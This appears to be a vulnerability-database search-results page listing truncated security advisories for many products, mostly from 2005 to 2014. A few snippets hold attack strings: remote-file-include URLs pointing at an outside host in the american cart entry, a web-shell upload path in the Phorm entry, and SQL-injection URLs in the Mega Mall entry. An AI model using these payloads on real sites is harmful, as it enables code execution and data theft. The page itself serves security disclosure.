47153 matches found
Java HotSpot Cryptographic Provider signature verification vulnerability
An attacker can add a cryptographic provider containing cipher implementation signed by an untrusted certificate. The attacker can also create his or her own jurisdiction policy files signed by an untrusted certificate. In order to achieve this, the attacker must first of all add a fake...
PHP 5.3.5 grapheme_extract() NULL Pointer Dereference
PHP 5.3.5 graphemeextract NULL Pointer Dereference Author: Maksymilian Arciemowicz http://securityreason.com/ http://cxib.net/ Date: - Dis.: 09.12.2010 - Pub.: 17.02.2011 CVE: CVE-2011-0420 CERT: VU210829 Affected Software: - PHP 5.3.5 Fixed: SVN Original URL:...
[SECURITY] CVE-2011-0534 Apache Tomcat DoS vulnerability
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2011-0534 Apache Tomcat DoS vulnerability Severity: Important Vendor: The Apache Software Foundation Versions Affected: - - Tomcat 7.0.0 to 7.0.6 - - Tomcat 6.0.0 to 6.0.30 Description: Tomcat did not enforce the maxHttpHeaderSize limit while...
Microsoft Security Bulletin MS10-090 - Critical Cumulative Security Update for Internet Explorer (2416400)
Microsoft Security Bulletin MS10-090 - Critical Cumulative Security Update for Internet Explorer 2416400 Published: December 14, 2010 Version: 1.0 General Information Executive Summary This security update resolves four privately reported vulnerabilities and three publicly disclosed vulnerabiliti...
nSense-2010-003: Cisco Unified Communications Manager
nSense Vulnerability Research Security Advisory NSENSE-2010-003 --------------------------------------------------------------- Affected Vendor: Cisco Systems, Inc Affected Product: Cisco Unified Communications Manager Platform: All Impact: Privilege Escalation Vendor response: Patch. IntelliShie...
Mozilla Foundation Security Advisory 2010-33
Mozilla Foundation Security Advisory 2010-33 Title: User tracking across sites using Math.random Impact: Low Announced: June 22, 2010 Reporter: Amit Klein Products: Firefox, SeaMonkey Fixed in: Firefox 3.6.4 Firefox 3.5.10 SeaMonkey 2.0.5 Description Security researcher Amit Klein reported that i...
Applicure dotDefender 4.0 administrative interface cross site scripting
Applicure dotDefender 4.0 administrative interface cross site scripting An advisory by EnableSecurity. ID: ES-20100601 Advisory URL: http://resources.enablesecurity.com/advisories/ES-20100601-dotdefender4.txt Affected Versions: version 4.0 Fixed versions: 4.01-3 and later Description: Applicure...
Interactivefx.ie CMS SQL Injection Vulnerability
================================================ Interactivefx.ie CMS SQL Injection Vulnerability ================================================ 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' /' / /' 0 0 /, // ,/ / 1 1 // /' / // /' / /' 0 0 / / / / / / 1 1 / ...
Adobe Acrobat and Reader multiple security vulnerabilities
Code executions, memory corruptions, buffer overflow, integer overflow, DoS on PDF parsing...
Hijacking Opera's Native Page using malicious RSS payloads
Hijacking Opera's Native Page using malicious RSS payloads ---------------------------------------------------------------------------- --------- For complete post with images, please visit - http://securethoughts.com/2009/10/hijacking-operas-native-page-using-malicio us-rss-payloads/ Well, this...
[USN-824-1] PHP vulnerability
=========================================================== Ubuntu Security Notice USN-824-1 August 24, 2009 php5 vulnerability CVE-2009-2687 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu...
Nokia N95-8 browser denial of service
Application: Nokia N95-8 OS: Symbian ------------------------------------------------------ 1 - Description 2 - Vulnerability 3 - POC/EXPLOIT ------------------------------------------------------ Description The nokia n95 is a smartphone, this phone have more tools, for example:...
[SECURITY] CVE-2008-2938 - Apache Tomcat information disclosure vulnerability - Updated
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2008-2938: Apache Tomcat information disclosure vulnerability - Updated Severity: Important was moderate Vendor: The Apache Software Foundation Versions Affected: Tomcat 4.1.0 to 4.1.37 Tomcat 5.5.0 to 5.5.26 Tomcat 6.0.0 to 6.0.16 The unsupported...
[Full-disclosure] Predictable DNS transaction IDs in Microsoft DNS Server
1 Summary Affected software: Microsoft Windows 2003 SP2, Microsoft Windows 2000 SP4 Server Vendor URL: www.microsoft.com Severity: Medium References: Microsoft Security Bulletin MS07-062, CVE-2007-3898 2 Vulnerability Description Microsoft DNS server generates predictable DNS transaction IDs. If...
american cart 3.* (abs_path) remote file include
american cart 3.5 abspath remote file include script Vendor: http://americancart.us Discovered by: IbnuSina Dork : "powered by american cart" ================= exploitz : http://target.lu/americanpath/index.php?abspath=injekan.lu? http://target.lu/americanpath/checkout.php?abspath=injekan.lu?...
sazcart v1.5 (cart.php) Remote File include
---Hitamputih crew--- Bug Found By : IbnuSina vendor : http://sazcart.com/site Risk : High Greetz : Solpot,permenhack,barbarosa,cah|gemblunkz,fungmen,setiawan,irvian,meteoroid and all member hitamputih crew community bug found on admin/controls/cart.php include$saz'settings''shippingfolder'...
Simple Machines Forum (SMF) XSS issue
title: Simple Machines Forum SMF XSS issue author: Jose Carlos Norte discovered by: Jose Carlos Norte 1. introduction Simple machines forum is a popular scalable free bulletin board system written in php over mysql database, the url of the project: http://www.simplemachines.org/ 2. XSS problem SM...
Microsoft Security Bulletin MS05-017 Vulnerability in Message Queuing Could Allow Code Execution (892944)
Microsoft Security Bulletin MS05-017 Vulnerability in Message Queuing Could Allow Code Execution 892944 Issued: April 12, 2005 Version: 1.0 Summary Who should read this document: Customers who use Microsoft Message Queuing MSMQ Impact of Vulnerability: Remote Code Execution Maximum Severity Ratin...
Symantec LiveUpdate attacks
Phenoelit Advisory wir-haben-auch-mal-was-gefunden 0815 Authors FX [email protected] DasIch [email protected] kim0 [email protected] Phenoelit Group http://www.phenoelit.de Affected Products Symantec LiveUpdate 1.4 Symantec LiveUpdate 1.6 Vendor communication 09/22/2001 Symantec contacted via...
[USN-2391-1] php5 vulnerabilities
========================================================================== Ubuntu Security Notice USN-2391-1 October 30, 2014 php5 vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...
APPLE-SA-2014-10-16-1 OS X Yosemite v10.10
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2014-10-16-1 OS X Yosemite v10.10 OS X Yosemite v10.10 is now available and addresses the following: 802.1X Impact: An attacker can obtain WiFi credentials Description: An attacker could have impersonated a WiFi access point, offered to...
[security bulletin] HPSBMU03110 rev.1 - HP Sprinter, Remote Execution of Code
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c04454636 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04454636 Version: 1 HPSBMU03110 rev....
[SECURITY] [DSA 2970-1] cacti security update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2970-1 [email protected] http://www.debian.org/security/ Moritz Muehlenhoff June 29, 2014 http://www.debian.org/security/faq -...
[ISecAuditors Security Advisories] - Reflected XSS vulnerability in Boxcryptor (www.boxcryptor.com)
============================================= INTERNET SECURITY AUDITORS ALERT 2014-001 - Original release date: February 4, 2014 - Last revised: February 4, 2014 - Discovered by: Vicente Aguilera Diaz - Severity: 4.3/10 CVSSv2 Base Scored - CVE-ID: - =============================================...
[ MDVSA-2013:235 ] mediawiki
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2013:235 http://www.mandriva.com/en/support/security/ Package : mediawiki Date : September 16, 2013 Affected: Business Server 1.0 Problem Description: Multiple vulnerabilities has been discovered and corrected in...
ESA-2013-002: RSA Archer® GRC Multiple Vulnerabilities
ESA-2013-002.txt -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2013-002: RSA Archer® GRC Multiple Vulnerabilities EMC Identifier: ESA-2013-002 CVE Identifier: CVE-2012-2293, CVE-2012-2292, CVE-2012-1064, CVE-2012-2294 Severity Rating: See below for scores for individual issues Affected...
Guests can view names and emailadresses of all Liferay users in liferay 6.1
Guests can view names and emailadresses of all Liferay users in liferay 6.1 Description: Liferay Portal is an enterprise portal written in Java As an unauthenticated user it is possible to retrieve the names and email adresses of all Liferay users. To retrieve a list of all users simply issue the...
[SECURITY] [DSA 2480-1] request-tracker3.8 security update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2480-1 [email protected] http://www.debian.org/security/ Moritz Muehlenhoff May 24, 2012 http://www.debian.org/security/faq -...
Flatnux CMS 2011 08.09.2 - Multiple Web Vulnerabilities
Title: ====== Flatnux CMS 2011 08.09.2 - Multiple Web Vulnerabilities Date: ===== 2012-04-01 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=487 VL-ID: ===== 487 Introduction: ============= Flatnux is no database CMS for accessible websites, corporate websites, e-commer...
Seotoaster SQL-Injection Admin Login Bypass
Advisory: Seotoaster SQL-Injection Admin Login Bypass Advisory ID: INFOSERVE-ADV2011-06 Author: Stefan Schurtz Contact: [email protected] Affected Software: Successfully tested on Seotoaster v.1.9 Vendor URL: http://www.seotoaster.com/ Vendor Status: fixed ==========================...
Apple Safari / WebKit multiple security vulnerabilities
Crossite scripting, multiple memory corruption, code execution...
Re: NGS00099 Patch Notification: Vulnerable SUID script in (nomachine) NX Server for Linux
Research@NGSSecure [email protected] wrote: Vulnerable SUID script in nomachine NX Server for Linux 3.5.0-4 Advanced and Enterprise across redhat and debian hosts 21 September 2011 NGS Secure has discovered a High risk vulnerability in nomachine NX Server for Linux 3.5.0-4 Advanced and...
[security bulletin] HPSBMU02669 SSRT100346 rev.3 - HP Data Protector Media Management Daemon (mmd), Remote Denial of Service (DoS)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02940981 Version: 1 HPSBMU02669 SSRT100346 rev.3 - HP Data Protector Media Management Daemon mmd, Remote Denial of Service DoS NOTICE: The information in this Security Bulletin should be acted up...
ZDI-11-183: Oracle Java ICC Profile MultiLanguage 'mluc' Tag Parsing Remote Code Execution Vulnerability
ZDI-11-183: Oracle Java ICC Profile MultiLanguage 'mluc' Tag Parsing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-183 June 8, 2011 -- CVE ID: CVE-2011-0862 -- CVSS: 9, AV:N/AC:L/Au:N/C:P/I:P/A:C -- Affected Vendors: Oracle -- Affected Products: Oracle Jav...
AR Web Content Manager (AWCM) Cross-Site scripting Vulnerability
AR Web Content Manager AWCM v2.2 Cross-Site scripting Vulnerability SecPod Technologies www.secpod.com Author: Antu Sanadi SecPod ID: 1012 21/03/2011 Issue Discovered 24/03/2011 Vendor Notified 24/03/2011 Vendor Responded 25/03/2011 Vendor Solution Class: Cross-Site Scripting Severity: Medium...
[SECURITY] [DSA 2121-1] New TYPO3 packages fix several vulnerabilities
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-2121-1 [email protected] http://www.debian.org/security/ Florian Weimer October 19, 2010 http://www.debian.org/security/faq -...
Microsoft Security Bulletin MS10-061 - Critical Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290)
Microsoft Security Bulletin MS10-061 - Critical Vulnerability in Print Spooler Service Could Allow Remote Code Execution 2347290 Published: September 14, 2010 Version: 1.0 General Information Executive Summary This security update resolves a publicly disclosed vulnerability in the Print Spooler...
Security vulnerabilities in HP ProCurve switches
Unauthorized access, information leak, DoS...
PR09-17: Juniper Secure Access seriers (Juniper IVE) authenticated XSS & REDIRECTION
PR09-17: Juniper Secure Access series Juniper IVE authenticated XSS & REDIRECTION http://www.procheckup.com/vulnerabilitymanager/vulnerabilities/pr09-17 Vulnerability found: 12th October 2009 Vendor informed: 12 October 2009 Severity: Medium Script injection Description: There are multiple...
XSRF (CSRF) in CuteSITE CMS
Vulnerability ID: HTB22395 Reference: http://www.htbridge.ch/advisory/xsrfcsrfincutesitecms.html Product: CuteSITE CMS Vendor: AMT Company Vulnerable Version: 1.5.0 and Probably Prior Versions Vendor Notification: 20 May 2010 Vulnerability Type: CSRF Cross-Site Request Forgery Status: Not Fixed,...
Critical PowerDNS Recursor Security Vulnerabilities: please upgrade ASAP to 3.1.7.2
Dear PowerDNS Users, Two major vulnerabilities have recently been discovered in the PowerDNS Recursor all versions up to and including 3.1.7.1. Over the past two weeks, these vulnerabilities have been addressed, resulting in PowerDNS Recursor 3.1.7.2. Given the nature and magnitude of these...
Vulnerabilities in XAMPP
Hello 3APA3A! I want to warn you about security vulnerabilities in XAMPP. These are Information Leakage, Cross-Site Request Forgery and SQL Injection vulnerabilities. Information Leakage: http://site/xampp/phpinfo.php During access to admin panel via Insufficient Authorization vulnerabilities it'...
Novell GroupWise Internet Agent Remote Buffer Overflow Vulnerabilities
VUPEN Security Research Advisory - VUPEN-SR-2009-01 // VUPEN-SR-2009-02 Advisory URL: http://www.vupen.com/english/advisories/2009/1393 May 22, 2009 I. BACKGROUND ---------------------- Novell GroupWise is a complete collaboration software solution that provides information workers with e-mail,...
Potential SQL injection vulnerability in Apache::AuthCAS
Some weeks ago, I sent the following message to David Castro, the author of Apache::AuthCAS. As there hasn't been any reply and the guys at ja-sig.org haven't been able or willing to look into it, perhaps there is somebody here who wants to have a closer look at this? CAS is the Central...
3proxy 0.5.3j released (bugfix)
3proxy http://3proxy.ru/ is multi-platform Windows, Linux, Unix multi-protocol proxy server with abilities to mange traffic flows and bandwidths, convert requests between different proxy types, authenticate, authorize, control, limit and account users access and more. 3proxy 0.5.3j version was...
Phorm v3.0 Remote File Upload Vulnerability
Phorm v3.0 Remote File Upload Vulnerability ilker kandemir ilkerkandemiratmynet.com Download: ftp://ftp.holotech.net/phorm/phorm.zip TnX.: Ajann, Dumenci, H0tTurk, Str0ke Exploit: http://site/phormpath/lib/fileupload.php +===== upload your shell.php http://site/phormpath/files/phpshell.php...
Mozilla Foundation Security Advisory 2007-19
Mozilla Foundation Security Advisory 2007-19 Title: XSS using addEventListener and setTimeout Impact: High Announced: July 17, 2007 Reporter: Products: Firefox Fixed in: Firefox 2.0.0.5 Description Mozilla contributor mozbugra4 demonstrated that the methods addEventListener and setTimeout could b...
webMethods Glue Management Console Directory Traversal
aushack.com - Vulnerability Advisory ----------------------------------------------- Release Date: 11-Apr-2007 Software: webMethods - webMethods Glue Management Console http://www.webmethods.com/ "With webMethods Glue developers can easily create SOAP interfaces for their existing Java and C/C++...
Mega Mall [ multiples injection sql & full path disclosure ]
vendor site: http://products.kaonsoftwares.com/ product: mega-mall bug:injection sql & full path disclosure language: asp risk: high injection sql get: http://site.com/mega-mall/productreview.php?t=sql http://site.com/mega-mall/productreview.php?t=0&productId=sql...
[Full-disclosure] Invision Power Board 2.1.7 debug mode vulnerability
Debug mode is a feature in IPB 2.0.0-2.1.7 that shows all database queries for each forum page requested. If Debug mode is turned on, it is possible for anyone to request a forgotten password for an account, and capture the validation key that is sent to the account's email address. This allows a...